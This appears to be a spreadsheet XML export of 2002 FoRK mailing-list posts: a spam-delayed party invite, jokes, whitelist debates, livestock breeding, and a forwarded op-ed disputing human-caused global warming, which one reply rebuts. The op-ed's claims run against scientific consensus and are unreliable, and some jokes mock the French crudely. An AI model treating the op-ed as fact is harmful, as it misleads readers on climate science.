&gt; &gt; apartment in Sunnyvale on the Fourth!
&gt; 
&gt; So here's the final report on the HD/ID party. As no less than TEN 
&gt; forkers pointed out, the invitation, while sent on Sunday 6/30, was only 
&gt; delivered ten days later on 7/9.
&gt; 
&gt; It got flagged as spam.
&gt; 
&gt; Yes, on a mailing list awash in crap -- and some it is even unsolicited 
&gt; commercial email, heavens! -- our trusty mailman filters captured and 
&gt; quarantined just two posts that week, one from me that was &gt; 100K (the 
&gt; fat articles) and one that was bcc:d (the invite).
&gt; 
&gt; Now, it was a little difficult to recalibrate self-esteem, which as you 
&gt; can imagine was proportional to the two-digit attendance  -- in binary!
&gt; 
&gt; According to the George Washington documentary, I almost had as much 
&gt; alcohol on hand than he did -- Virginia tradition being to copiously 
&gt; lubricate each voter. Election day was a public festival day, and it 
&gt; cost poor George an average of SIXTY-FOUR shots of hard liquor PER VOTER 
&gt; that day...
&gt; 
&gt; So, herewith is the prize for most appropriate flame my delayed invite 
&gt; got:
&gt; 
&gt; &gt; I unfortunately will have had other plans and thus will
&gt; &gt; not be able to have made it.  Yes.
&gt; &gt;
&gt; &gt; -faisal
&gt; 
&gt; One of our competitors added:
&gt; &gt; Wow - I just got this now - I guess that was KnowLate!
&gt; 
&gt; And there is no prize for guessing which cold, dark forks emitted these 
&gt; two plaints:
&gt; 
&gt;  From Whiny Dwarf:
&gt; &gt; Fix your mail server! just a bit late!
&gt; 
&gt; And Angry Dwarf:
&gt; &gt; God DAAAAAMMMMMNNNNN IIIIITTT! I didn't see your message until now! 
&gt; &gt; Fuck! Fuck! Fuck!
&gt; &gt;
&gt; &gt; We would have been there if I had seen the message before. Kuso! (as 
&gt; &gt; the Japanese would say).
&gt; &gt;
&gt; &gt; Fuck.
&gt; &gt; Fuck.
&gt; &gt; Fuck.
&gt; &gt; Fuck.
&gt; &gt; Fuck.
&gt; &gt; Fuck.
&gt; 
&gt; Perhaps I should remind the latter gently that it was not in any way his 
&gt; fault. The universe *was* out to get him!
&gt; 
&gt; And finally, here's an object lesson for all ye of little faith to learn 
&gt; from my sins:
&gt; 
&gt; &gt; SpamAssassin rated it spam (barely). Gotta stop
&gt; &gt; using those "words and phrases which indicate porn" :-)
&gt; 
&gt; Yes, boys and girls, Mr. Assassin, like Mr. Lott, gets very annoyed if 
&gt; you call the Great American Shrine a... "boob tube"
&gt; 
&gt; :-)
&gt;    Rohit
&gt; 
&gt; PS. This is the obscure footnote where I actually hide the bits in this 
&gt; post. What we just encountered here is that an event-processing system 
&gt; with a 10-day RTT cannot be used to reliably handle events more often 
&gt; than once every 20 days. That's why I waited to reply. six bonus points 
&gt; to anyone who can prove this hunch of mine. Hint: try analyzing the 
&gt; problem in frequency-domain.
&gt; 
&gt; http://xent.com/mailman/listinfo/forkhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">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invite).Wait... I didn't think we had any filters set up on FoRK.
Kragen, do you know of any?I personally have FoRK delivered to an address (napier%waste.org)
that has SpamAssassin enabled, agressively, where it just nukes
anything it thinks is spam. Usually I figure if I miss a FoRK post,
no big deal, I'll pick it up by the replies if it's interesting.For personal mail (joe%barrera.org) I either don't use SpamAssassin,
or use it but where it just flags messages instead of nuking them.
So if someone is sending a message just to me, I'll get it even
if it looks like spam.So in other words, Rohit, if you had sent to joe%barrera.org, I
guess I would have received it in a timely fashion.So where's all that booze? When's the retry?
Every robust protocol needs a retry strategy --
what's yours?- Joe the Angry DwarfP.S. Ain't no dwarf.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
You're in luck because my mom sends these all the time and I never
have anything else to do with them ... An old man lived alone in Minnesota. He wanted to spade his potato garden,
but it was very hard work.
 His only son, who would have helped him, was in Prison. The old man  wrote
a  letter to his son and mentioned his predicament.
 Shortly, he received this reply, "For heaven's sake Dad, don't dig up  that
garden, that's where I buried the GUNS!"
 At 4 A.M. the next morning, a dozen police showed up and dug up the old
man's entire garden, without finding any guns.
 Confused, the old man wrote another note to his son telling him what
happened, and asking him what to do next.
 His son's reply was: "Now plant your potatoes, Dad. It's the best
I could  do  at this time."but better than that, just settle into this, courtesy of daypop:
http://xroads.virginia.edu/~UG02/yeung/actioncomics/cover.html-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 24 Jul 2002, Robert Harley wrote:--]Working too hard...
--]
--]Someone tell me a joke, or email me a beer or something...You asked for it....Ladies and Gentlebeans....its time now for Shlepy Shlepman and Frenchy
along with there  all groan reviews.....Shlepy&gt; Heya heya heya ..I just flew in from defcon and boy are my ports
tierd.....waka wakaFrenchie&gt;Des Amricains, je vous dteste et tous que vous reprsentez. Vous
tes des porcs.Shlepy&gt;Say Frenchie, how do you castrate a frenchmen???Frenchie&gt;Est-elle cette une autre mauvaise plaisanterie? Je ne sais pas,
satisfaire vous rends ce drole singe global d'ane.Shlepy&gt;You kick his sister in the jaw.Frenchie&gt;Je suis dans l'enfer.Shelpy&gt;Dont he speak funny folks? yep them French are mighty bizzare.
They do things very differently over there. For instace you know why
they dont have fireworks at Euro Disney?Frenchie&gt; Puisque nous soufflerions plutt nos ttes outre de qu'observe un
infrieur brut classer la clbration amricaine?Shlepy&gt;What ever ya said, nope..Because every time they shoot
them off, the French try to surrender.Frenchie&gt;Etant donn le choix entre les Allemands et vous que je
nettoierais heureusement versez les stalles dans les camps alors doivent
aller  vos parcs d'amusement.Shlepy&gt; Aint he the continental one....Speaking of global
politics....Three guys, an Englishman, a Frenchman and an American are out
walking along the beach together one day. They come across a lantern and a
genie pops out of it.  "I will give you each one wish, " says the genie.
The American says, "I am a farmer, my dad was a farmer, and my son will
also farm. I want the land to be forever fertile in America." With a blink
of the genie's eye, 'FOOM'  -  the land in America was forever made
fertile for farming.  The Frenchman was amazed, so he said, "I want a wall
around France, so that no one can come into our precious country."  Again,
with a blink of the Genie's eye, 'POOF'  -  there was a huge wall around
France.  The Englishman asks, "I'm very curious. Please tell me more about
this wall.  The Genie explains, "Well, it's about 150 feet high, 50 feet
thick and nothing can get in or out."  The Englishman says, "Fill it up
with water."Fenchie&gt;Plutt nous devrions nous noyer que mangent la cuisine anglaise.Shlpey&gt;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we're well away. Tidy!"  The professor tries Scotland next "Hoots an'
toots man, I put her back legs down my nice green wellies, grab her with
me velcro gloves, and we're  well away. Och aye tha noo!"  The professor
moves on to Germany: "Well, I find the most efficient way is to grab her
with my velcro gloves, and we're well away. The professor is noticing a
pattern developing, so he decides to try France, and then end his
investigation.  He stops a bloke by the Eiffel tower named Pierre, and
asks him to explain the French method: "Well monsieur, I put her back legs
down my nice green wellies, sling her front legs over me shoulders, and
that's all there is to it!" The professor is excited to have found some
national variation and tells Pierre that this is different to the methods
of the Scots, Welsh and Germans. "How do they do it then?" asks Pierre,
and the professor explains. Pierre on hearing the explanation walks of
disgusted. "What! No kissing?"Frenchie&gt;Voil. J'ai stopp.Shlepy&gt; Hey, where you going with the sheep, we need them for the next
act....A little traveling music maestro.-tomwsmf
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Perhaps it's time to revisit ...http://www.engrish.com/recentdiscoveries.html"evirob" is the essence of weird life.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">At 5:47 PM -0700 on 7/23/02, Joseph S. Barrera III wrote:
&gt;     And the pirate says, "Aaar, its driving me nuts!"I can do better pirate jokes than *that*.Like, what's the 18th letter of the Pirate alphabet?No?Okay, a pirate koan then. What's the sound of a pirate clapping?:-).Cheers,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</si>
  <si>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At 10:46 PM 7/23/02 -0700, Gordon Mohr wrote:
&gt;Surprised this wasn't already passed through here: about a 
&gt;week and a half ago, Walter Mossberg reviewed ChoicEMail, 
&gt;a spam-fighting tool where new, unknown senders have to 
&gt;request passage through your whitelist-based mailwall.Lately, a fairly large % of the spam I've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helpful.Plus, I'm still not sure how I feel about whitelists.  I don't think I'm so
special that people should need to fill out a special form just to send me
email.  I could see certain friends of mine getting fairly annoyed
(especially those with multiple email addresses...).-Mike
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">I have a similar one:
Bubba calls up the DEA and tells em that JoeBob is growing pot and 
hiding it in his back yard.  They go over, find nothing, and go ask Bubba 
what he was talking about.  Bubba tells em it's in JoeBob's woodpile.  So 
they go chop up all the wood and look through it and scatter it all over 
the yard, but find nothing.  They ask Bubba again, and he tells them that 
JoeBob must have already sold it, so they leave.  Bubba calls up JoeBob:
Bubba: You get your wood chopped?'
JoeBob: Yep, thanks, I'll give ya 15 bucks tomorrow.  (:sillyheadOn 23 Jul 2002, Gary Lawrence Murphy wrote:&gt; 
&gt; You're in luck because my mom sends these all the time and I never
&gt; have anything else to do with them ...
&gt; 
&gt;  An old man lived alone in Minnesota. He wanted to spade his potato garden,
&gt; but it was very hard work.
&gt;  His only son, who would have helped him, was in Prison. The old man  wrote
&gt; a  letter to his son and mentioned his predicament.
&gt;  Shortly, he received this reply, "For heaven's sake Dad, don't dig up  that
&gt; garden, that's where I buried the GUNS!"
&gt;  At 4 A.M. the next morning, a dozen police showed up and dug up the old
&gt; man's entire garden, without finding any guns.
&gt;  Confused, the old man wrote another note to his son telling him what
&gt; happened, and asking him what to do next.
&gt;  His son's reply was: "Now plant your potatoes, Dad. It's the best
&gt; I could  do  at this time."
&gt; 
&gt; but better than that, just settle into this, courtesy of daypop:
&gt; http://xroads.virginia.edu/~UG02/yeung/actioncomics/cover.html
&gt; 
&gt; -- 
"My theology, briefly, is that the universe was dictated but not
          signed."  (Christopher Morley) 
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 23 Jul 2002, Mike Masnick wrote:&gt; Lately, a fairly large % of the spam I've been getting has been coming
&gt; from spam systems that forge my own address as the "from" address...Include a random token with an expiration date with anything you send.  
Valid whitelisting of From:you@here.net yet invalid random token would get 
blocked.&gt; Those spam messages would get through any whitelist I set up
&gt; (especially since I email stuff to myself all the time).  If
&gt; whitelists become more popular, I imagine spammers will resort to
&gt; doing that for the majority of their spams, making whitelists less
&gt; helpful.Spammers cannot be bothered to keep track if individual whitelists 
associated with a given email address.
&gt; Plus, I'm still not sure how I feel about whitelists.  I don't think I'm so
&gt; special that people should need to fill out a special form just to send meOf course you populate your whitelist with contents of your inbox minus 
spam, and then add manually stuff from your addressbook.&gt; email.  I could see certain friends of mine getting fairly annoyed
&gt; (especially those with multiple email addresses...).What's the point of multiple email addresses? They're a pain.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Rohit Khare said:&gt; &gt; SpamAssassin rated it spam (barely). Gotta stop
&gt; &gt; using those "words and phrases which indicate porn" :-)
&gt; Yes, boys and girls, Mr. Assassin, like Mr. Lott, gets very annoyed if 
&gt; you call the Great American Shrine a... "boob tube"Er, patches gratefully accepted ;)--j.-- 
'Justin Mason' =&gt; { url =&gt; 'http://jmason.org/', blog =&gt; 'http://taint.org/' }
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Eugen Leitl said:&gt; Spammers cannot be bothered to keep track if individual whitelists 
&gt; associated with a given email address.But it's a good bet that jm /at/ jmason.org, or someone-else /at/
jmason.org, is in jm /at/ jmason.org's whitelist.&gt; Of course you populate your whitelist with contents of your inbox minus 
&gt; spam, and then add manually stuff from your addressbook.all I can read there is "manual"...--j.-- 
'Justin Mason' =&gt; { url =&gt; 'http://jmason.org/', blog =&gt; 'http://taint.org/' }
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
how's about the String Joke?A piece of string and his friend walks into a bar.  The barman says
"sorry, we don't serve string here".  String &amp; friend walk out
(grumbling).  String asks friend "listen, could you tatter my ends and
tie me up?"  Friend obliges, and they return; barman says "aren't you
that piece of string I threw out?"  "No, I'm a frayed knot."--j.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; &gt; Tom said:
&gt; &gt;
&gt; &gt; The question then becomes, why is knowledge sharing such a difficult 
&gt; &gt; thing in organizations?And Owen replied:&gt; Well, IMNHO, its because companies do not reward knowledge sharers. When I don't work in this area, but I have a suspicion that many people
suspect projects for "knowledge management" and "knowledge sharing" as
attempts to eliminate their jobs, or at least their importance. If "the
organization" knows all the things I know, why does it need me?This should actually be easy to test experimentally: compare the results
of having someone call up and say, "Can you show us how to do X for this
project we're working on?" with those of having someone summoned by a
knowledge management project to explain how to do X for the knowledge
archives.    - Win
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">A little tidbit for those who still believe in science by opinion poll...Cheers,
RAH
http://www.techcentralstation.com/1051/printer.jsp?CID=1051-072302BJust Ask the Experts
By Sallie Baliunas and Willie Soon 07/23/2002
In 2001 the National Science Foundation surveyed 1,500 people nationwide
and found that 77% believed that "increased carbon dioxide and other gases
released into the atmosphere will, if unchecked, lead to global warming
..." Yet half of those polled believed that humans and dinosaurs co-existed
on Earth, despite the scientific fact that the dinosaurs went extinct tens
of millions of years before the earliest hominids appeared. Worse, only 22%
of the respondents understood what a molecule - for example, carbon dioxide
- is.As in the case of the belief by many that dinosaurs and early humans
co-existed, public opinion does not change the actual facts about the
material world. Such a poll measures nothing more than the degree of public
ignorance about scientific matters.Most people get news stories about science and technology developments from
television. And after more than a decade of being fed what-if stories about
global warming from human activities, no wonder most people "believe" that
global warming "will" occur. However, on the anxiety scale, only 33% "worry
a great deal" about global warming, a worry that ranks at 12 out of 13
environmental concerns. The top environmental fear, shared by 64% of those
polled, was polluted drinking water.So What Do We Know?Concerning the latest understanding on human-made global warming, here are
three points we know from the science:   1. The surface record of temperature from thermometers show widespread
warming in the 20th century compared to the 19th. There was one period of
warming early in the 20th century, the second after the 1970s. Ecosystems
have responded to this widespread warmth, not seen since ca. 800 - 1200 C.E.      But the cause of global surface warming cannot be associated with
human activity without additional information. Some media reports point to
ecosystem responses of 20th century warmth (e.g., mountain glacier retreat)
and unjustifiably claim the responses owe to man-made causes. But mountain
glaciers receded during the past period of warmth around 1,000 years ago,
and advanced during the unusual cold of the Little Ice Age (ca. 1300 - 1900
C.E.). Both those climate shifts occurred naturally, before the increased
concentration of human-made greenhouse gases in the air.
    #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human-made warming trend over the last
two or even four decades. Thus, the recent warming trend in the surface
temperature record cannot be caused by the increase of human-made
greenhouse gases in the air.
    # The computer simulations are not reliable as tools for explaining
past climate or making projections for future trends.Future Shock: The ScenariosWhen it comes to future scenarios, consider what the experts actually say
about potential climate change. The United Nations Intergovernmental Panel
on Climate Change writes in its Special Report on Emissions Scenarios
(2000), "Scenarios are images of the future or alternative futures. They
are neither predictions nor forecasts." Further, "The possibility that any
single emissions path will occur as described in the scenario is highly
uncertain," and finally, "No judgement is offered in this Report as to the
preference for any of the scenarios and they are not assigned probabilities
of occurrence, neither must they be interpreted as policy recommendations."Forecasting future societal conditions and energy use often amount to
little more than unconvincing guesses. Jesse Ausebel at Rockefeller
University in April 2002 critiqued the U.N. IPCC's " ... 40 energy
scenarios, with decarbonization, or carbonization, sloping every which way
and no probabilities attached. ... It is a confession that collectively
they know nothing, that no science underlies their craft, and that politics
strongly bias their projections."Nonetheless, such a guess about the world's energy future forms the first
step in making a 100-year prediction of global warming. That first
uncertain forecast - future energy use - used as input in the climate
simulation surely compounds the uncertainty in the next step, the climate
forecast.Inability to predict the future should not be surprising. The climate
simulations upon which predictions are based yield unreliable results
because, as outlined above, the results are incompatible with measurements
of how the climate has changed in the last few decades.Complete SpeculationOn May 24, 1994, Richard Lindzen, the Alfred P. Sloan Professor of
Meteorology at MIT, testified to the Senate Committee on Energy and Natural
Resources, "The claims about catastrophic consequences of significant
global warming, should it occur at all, are almost completely speculative.
Not only are they without any theoretical foundations, but they frequently
involved assuming the opposite of what appears to happen."Despite years of solid work by climate specialists, the output of computer
simulations remains undependable, owing to the extraordinary complexity of
the natural world. Thus, on May 1, 2001 Lindzen testified to the Senate
Commerce Committee about the long-standing inability of computer
simulations to deliver results that resemble reality, even in the cases
where good measurements are available:"For example, there is widespread agreement [among climate scientists] ...
that large computer climate models are unable to even simulate major
features of past climate such as the 100 thousand year cycles of ice ages
that have dominated climate for the past 700 thousand years, and the very
warm climates of the Miocene [23 to 5 million years ago], Eocene [57 to 35
million years ago], and Cretaceous [146 to 65 million years ago]. Neither
do they do well at accounting for shorter period and less dramatic
phenomena like El Ninos, quasi-biennial oscillations, or intraseasonal
oscillations - all of which are well documented in the data, and important
contributors to natural variability."
Lindzen explained the failure of computer simulations simply in May 2000:"The point I am making is that it is a fallacious assumption that the
models have everything in them, and will display it, and somehow the rest
is just technical uncertainty. There are things they literally don't have."
This punctuates the popular notion that averaging output from computer
results will somehow, miraculously, give a scientifically appropriate
result.Think LocallyNow, on top of the unreliable forecasts of global warming -- which rest on
"highly uncertain" forecasts of future economic and social conditions and
un-validated climate simulations -- come the forecasts of local impacts, in
order to make the case for relevancy to people. Increased storminess is one
prediction of the outcome of human-made global warming found in the popular
media, which would be where most people learn about the issue.The idea that storminess increases with human-made global warming defies
expert opinion. David Legates, an expert hydrology researcher, testified in
the Senate Committee on Environment and Public Works on March 13, 2002:"Ascertaining anthropogenic changes to these extreme weather events is
nearly impossible. Climate models cannot even begin to simulate storm-scale
systems, let alone model the full range of year-to-year variability...
Clearly, claims that anthropogenic global warming will lead to more
occurrences of droughts, floods, and storms are wildly exaggerated."
The U.N. IPCC Third Assessment Report concurs, "[T]here is currently
insufficient information to assess recent trends, and climate models
currently lack the spatial detail required to make confident projections.
For example, very small-scale phenomena, such as thunderstorms, tornadoes,
hail and lightning, are not simulated in climate models (Summary for
Policymakers, p. 15)."A group of extremely relevant experts, the American Association of State
Climatologists, recently summarized the state of climate simulations:"Climate prediction is complex with many uncertainties ... For time scales
of a decade or more, understanding the empirical accuracy of such
predictions - called "verification" - is simply impossible, since we have
to wait a decade or longer to assess the accuracy of the forecasts. ...
climate predictions have not demonstrated skill in projecting future
variability and changes in such important climate conditions as growing
season, drought, flood-producing rainfall, heat waves, tropical cyclones
and winter storms. These are the type of events that have a more
significant impact on society than annual average global temperature
trends."
On the facts of human-made global warming, should one believe television or
the experts?--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</si>
  <si>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At 2:55 PM -0400 on 7/23/02, Win Treese wrote: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archives.About the only way I've heard of something like this working was back in
the Eighties, when management poster-child QuadGraphics used to have the
maxim "you can't get promoted unless you teach someone your job".That might do the trick, though I don't know what happened to QuadGraphics...Cheers,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</si>
  <si>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R. A. Hettinga wrote:&gt;A little tidbit for those who still believe in science by opinion poll...
&gt;
&gt;Cheers,
&gt;RAH
&gt;  
&gt;Was there any science in there? All I saw was more of the "myth of the 
liberal media." Every opinion supporting global warming was "the media", 
every opinion against it was an "expert." A brief perusal of the rest of 
the web site and I'm left wondering where the science
is.
And, to put on my extremist hat, every organization or scientist in 
there was American. Big deal - a bunch of scientists being trotted out 
to support government and industrial policy that is the ultimate source 
of their livelihood and research money. If the government changes their 
mind on Kyoto, they'll trot out another group of tame scientists. And 
all the American papers will switch back to warning us about climate change.Owen
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">From: Win Treese 
&gt; And Owen replied:
&gt; &gt; Well, IMNHO, its because companies do not reward knowledge sharers.
&gt;
&gt; I don't work in this area, but I have a suspicion that many people
&gt; suspect projects for "knowledge management" and "knowledge sharing" as
&gt; attempts to eliminate their jobs, or at least their importance. If "the
&gt; organization" knows all the things I know, why does it need me?I agree wholeheartedly.  It is easier to sit on knowledge than to
continually acquire more on the frontiers.&gt;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archives.This is in fact very true.  People hate doing this for several reasons in
my experience:
1) "Software changes.   Why waste time writing a FAQ now that will be out
of date at the next release in 3 months?"
2) "This knowledge is specialized.  Only 4 people need to know this, and
they already do.  If anyone else needs to know it they know who they can
call."
The same engineers who give these excuses will spend eternities on the
phone discussing this arcana and sharing the knowledge with anyone who has
the patience to ask.The strongest contributors freely share everything they know whenever
asked (or whenever they see the need for the information in the company)
and who at the same time continue to generate new knowledge.Personal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JTShttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; It also strikes me that it will not be very long before livestock is
&gt; genetically engineered to be dumber and meatier, and better adapted to
&gt; living in industrial conditions.If we're willing to count artificial
selection as genetic engineering, it
has been happening since pre-literate
times, and is called "domestication".-Dave&gt; "When the truck leaves Arkansas, the invoice leaves via the U.S. mail
&gt; and they both arrive at about the same time," Collins says. "If our
&gt; receiving clerks could sign onto the network and do an electronic
&gt; handshake with the driver-you're over an item on this case, that case
&gt; was damaged-we're all in agreement, and then Tyson could send a clean
&gt; invoice about which there is no dispute."I can see the value to a system which
guaranteed that the truck would show
up with all items as ordered -- but if
there's going to be spoilage anyway, I
don't see how much value that "clean"
invoice provides -- just think about
the costs of reliable networks versus
reliable protocols on unreliable ones.If the trucks are unreliable, then the
sticky pads seem like the clear winner
for return on IT capital investment.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Dave Long  writes:&gt; &gt; It also strikes me that it will not be very long before livestock is
&gt; &gt; genetically engineered to be dumber and meatier, and better adapted to
&gt; &gt; living in industrial conditions.
&gt; 
&gt; If we're willing to count artificial
&gt; selection as genetic engineering, it
&gt; has been happening since pre-literate
&gt; times, and is called "domestication".But we're not willing to count it, I hope, since it isn't, any more
than natural selection is genetic engineering.-- 
Karl Anderson      kra@monkey.org           http://www.monkey.org/~kra/
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-07-23 at 19:00, Karl Anderson wrote:
&gt; Dave Long  writes:
&gt; 
&gt; &gt; &gt; It also strikes me that it will not be very long before livestock is
&gt; &gt; &gt; genetically engineered to be dumber and meatier, and better adapted to
&gt; &gt; &gt; living in industrial conditions.
&gt; &gt; 
&gt; &gt; If we're willing to count artificial
&gt; &gt; selection as genetic engineering, it
&gt; &gt; has been happening since pre-literate
&gt; &gt; times, and is called "domestication".
&gt; 
&gt; But we're not willing to count it, I hope, since it isn't, any more
&gt; than natural selection is genetic engineering.It's quite a bit more than natural selection; the times had a
fascinating article a few months back (possibly posted as bits here)
that note that one Holstein bull who died in the 70s is paternally
related to something like 40% of the world's cattle. That's way, way
more than natural selection, and (given the difficulty and expense of
isolating specific genes for size, industrial-living-ness, etc.) more
expansive than raw gene manipulation will be for some time.Luis
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Working too hard...Someone tell me a joke, or email me a beer or something...TIA,
  Rob.
     .-.                    Robert.Harley@argote.ch                    .-.
    /   \           .-.      Software Development       .-.           /   \
   /     \         /   \       .-.     _     .-.       /   \         /     \
  /       \       /     \     /   \   / \   /   \     /     \       /       \
 /         \     /       \   /     `-'   `-'     \   /       \     /         \
            \   /         `-'       ArgoTech      `-'         \   /
             `-'                http://argote.ch/              `-'
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Begin forwarded message:&gt; From: Ian Andrew Bell 
&gt; Date: Tue Jul 23, 2002  02:02:20 PM US/Pacific
&gt; To: foib@ianbell.com
&gt; Subject: @F: [GENERAL] Evil Polling
&gt;
&gt; I know you're sitting there asking yourself, "who is the most evil 
&gt; person on the planet?".  Wonder no more, your local search engine 
&gt; will tell you.  Just search for the phrase +" is EVIL" and 
&gt; let the internet tell you the real truth.  I used two engines to 
&gt; verify accuracy.
&gt;
&gt; Phrase: 							Google	Hotbot
&gt; +"Bert is EVIL"						14700	5100
&gt; +"Microsoft is EVIL"				1730	1600
&gt; +"Saddam Hussein is EVIL"			98		100
&gt; +"Ernie is EVIL"					75		69
&gt; +"Osama Bin Laden is EVIL"			61		72
&gt; +"Janet Reno is EVIL"				44		19
&gt; +"George Bush is EVIL"				39		17
&gt; +"Canada is EVIL"					19		82
&gt; +"George W. Bush is EVIL"			22		21
&gt; +"Tony Blair is EVIL"				11		12
&gt; +"Adolf Hitler is EVIL"				1		23
&gt; +"Dick Cheney is EVIL"				4		6
&gt; +"Pat Buchanan is EVIL"				3		6
&gt; +"Ghandi is EVIL"					2		5
&gt; +"Bart Simpson is EVIL"				0		1
&gt; +"Geoff Gachallan is EVIL"			0		0
&gt;
&gt;
&gt; -Ian.
&gt;
&gt;
&gt; -----------
&gt; FoIB mailing list -- Bits, Analysis, Digital Group Therapy
&gt; http://foib.ianbell.com/mailman/listinfo/foibhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tuesday, July 23, 2002, at 03:49 PM, Luis Villa wrote:&gt; It's quite a bit more than natural selection; the times had a
&gt; fascinating article a few months back (possibly posted as bits here)
&gt; that note that one Holstein bull who died in the 70s is paternally
&gt; related to something like 40% of the world's cattle. That's way, way
&gt; more than natural selection, and (given the difficulty and expense of
&gt; isolating specific genes for size, industrial-living-ness, etc.) more
&gt; expansive than raw gene manipulation will be for some time.http://www.absglobal.com/They know bull semen, and the burger you ate at lunch may have had its 
sire's contribution to its genetics purchased through them.My ex-wife worked in their lab for a year while I was in gradual school. 
We had boxes of masking tape from ABS pre-printed with the names and 
serial numbers of 'decomissioned' bulls.They are also known for the hideous puns on their sign just outside of 
Madison on I90/94. But the puns haven't been any good since the secretary 
who first wrote them retired.----
Bill Humphries 
http://www.whump.com/moreLikeThis/http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Someone tell me a joke, or email me a beer or something...A man is out driving in the country, and drives past a farm with the most
beautiful pig -- fat, healthy, pink, clean, etc. Just a lovely pig. He gets
out to admire the pig, and notices that it has a wooden leg! The farmer
comes by and says "Howdie", and the passerby says "I was just stopping to
admire your pig. What a lovely pig. But what's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"I'll say, that does show great bravery," said the passerby. "But, if you
don't mind my asking, what *is* the deal with the wooden leg?" The farmer
paused. "Well," he said, "a pig like that -- you don't want to eat it all at
once!"-- Sherry.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">My only joke, thanks to a professor at the University of Manitoba, circa 
1997. Set in the old west.A cowboy is riding along on his favorite horse when he's suddenly 
surrounded and taken prison by a band of roaming Indians. The indians 
take the cowboy and his horse and tell him the traditional way that the 
tribe deals with their victims:
Each day for the next 3 days, you get a wish. If its in our power to 
grant it to you, we will. After the 3rd wish is done, you die a horrible 
slow death. Time for your first wish.The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away.The next day, time for the wish comes, and the Indians, amazed at 
yesterday's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 etc.On the third and final day, the indians are totally amazed, and are 
eager to hear what the cowboy's wish will be. So they all gather round, 
and the cowboy again says "I want to talk to my horse." The horse is 
brought over, and this time the cowboy grabs the horse by the head, 
stares right at him, and says -- "Read my lips -- Posse! Posse!"
Owen
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sunday, June 30, 2002, at 12:18 AM, Rohit Khare wrote:
&gt; You're all invited to join me for a South Bay Hi-Def spectacle at my 
&gt; apartment in Sunnyvale on the Fourth!So here's the final report on the HD/ID party. As no less than TEN 
forkers pointed out, the invitation, while sent on Sunday 6/30, was only 
delivered ten days later on 7/9.It got flagged as spam.Yes, on a mailing list awash in crap -- and some it is even unsolicited 
commercial email, heavens! -- our trusty mailman filters captured and 
quarantined just two posts that week, one from me that was &gt; 100K (the 
fat articles) and one that was bcc:d (the invite).Now, it was a little difficult to recalibrate self-esteem, which as you 
can imagine was proportional to the two-digit attendance  -- in binary!According to the George Washington documentary, I almost had as much 
alcohol on hand than he did -- Virginia tradition being to copiously 
lubricate each voter. Election day was a public festival day, and it 
cost poor George an average of SIXTY-FOUR shots of hard liquor PER VOTER 
that day...So, herewith is the prize for most appropriate flame my delayed invite 
got:&gt; 	I unfortunately will have had other plans and thus will
&gt; 	not be able to have made it.  Yes.
&gt;
&gt; 	-faisalOne of our competitors added:
&gt; Wow - I just got this now - I guess that was KnowLate!And there is no prize for guessing which cold, dark forks emitted these 
two plaints: From Whiny Dwarf:
&gt; Fix your mail server! just a bit late!And Angry Dwarf:
&gt; God DAAAAAMMMMMNNNNN IIIIITTT! I didn't see your message until now! 
&gt; Fuck! Fuck! Fuck!
&gt;
&gt; We would have been there if I had seen the message before. Kuso! (as 
&gt; the Japanese would say).
&gt;
&gt; Fuck.
&gt; Fuck.
&gt; Fuck.
&gt; Fuck.
&gt; Fuck.
&gt; Fuck.Perhaps I should remind the latter gently that it was not in any way his 
fault. The universe *was* out to get him!And finally, here's an object lesson for all ye of little faith to learn 
from my sins:&gt; SpamAssassin rated it spam (barely). Gotta stop
&gt; using those "words and phrases which indicate porn" :-)Yes, boys and girls, Mr. Assassin, like Mr. Lott, gets very annoyed if 
you call the Great American Shrine a... "boob tube":-)
   RohitPS. This is the obscure footnote where I actually hide the bits in this 
post. What we just encountered here is that an event-processing system 
with a 10-day RTT cannot be used to reliably handle events more often 
than once every 20 days. That's why I waited to reply. six bonus points 
to anyone who can prove this hunch of mine. Hint: try analyzing the 
problem in frequency-domain.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">funny load message:
moo!moo!moo!moo!moo!moo!moo!moo!moo!moo!moo!moo!Document http://flog.us/ 
loaded successfullyteehee
C-- 
"My theology, briefly, is that the universe was dictated but not
          signed."  (Christopher Morley) 
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Okay, here's a joke I *just* made up while I was driving my car at home:One day a pirate walks into a bar with a steering wheel
   attached to his crotch. So the bartender says to him,
